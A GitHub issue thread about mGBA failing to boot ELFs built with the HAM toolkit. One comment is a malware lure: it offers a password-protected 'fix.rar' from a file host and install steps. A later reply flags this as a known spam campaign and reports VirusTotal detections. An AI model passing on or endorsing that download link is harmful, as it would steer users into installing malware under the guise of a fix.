### ISSUE TITLE
ELFs made with HAM (GCC 3.2.2) not detected as ELF

### ISSUE THREAD

**Issue by Sterophonick** [mgba-emu/mgba#3281]
The legacy HAM development kit uses GCC 3.2.2, and mGBA refuses to boot ELFs made with this kit, making it difficult to use the GDB server for debugging reasons. No$GBA does boot this, but it doesn't have a GDB server unfortunately. More information can be provided as needed.

Tested version: 0.10.3

Example ELF binary: [vscode-ham-template.elf.zip](https://github.com/user-attachments/files/16750959/vscode-ham-template.elf.zip)

Edit: idk what happened but it's apparently working now, which is the worst kind of fixed. I will reopen if the issue resurfaces in any way.

**Comment by YoungAgile** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by WhenGryphonsFly** [comment]
@Sterophonick you should be aware that there is a high risk that the file posted above by YoungAgile is malware. Variants of this message have been posted on many GitHub issues recently, with VirusTotal reporting the files as malicious. The link is now dead, so I cannot test that particular file, but the fact mediafire removed the link is itself worrying.

![image](https://github.com/user-attachments/assets/8bd6b1be-58be-4f7c-b838-58d942dc3a69)

Transcription of screenshot:
Just a little warning for everyone but bots seem to go around on GitHub posting malware links now.  
https://i.ibb.co/z7jQf2g/github-malware.png  
https://www.virustotal.com/gui/file/b127de888f09ce23937c12b7fccfa47a8f48312b0e43eb59b6243f665c6d366a

**Comment by Sterophonick** [comment]
> @Sterophonick you should be aware that there is a high risk that the file posted above by YoungAgile is malware. Variants of this message have been posted on many GitHub issues recently, with VirusTotal reporting the files as malicious. The link is now dead, so I cannot test that particular file, but the fact mediafire removed the link is itself worrying.
> 
> ![image](https://github.com/user-attachments/assets/8bd6b1be-58be-4f7c-b838-58d942dc3a69)
> 
> Transcription of screenshot:
> Just a little warning for everyone but bots seem to go around on GitHub posting malware links now.  
> https://i.ibb.co/z7jQf2g/github-malware.png  
> https://www.virustotal.com/gui/file/b127de888f09ce23937c12b7fccfa47a8f48312b0e43eb59b6243f665c6d366a

Got it. Thanks for the heads up.
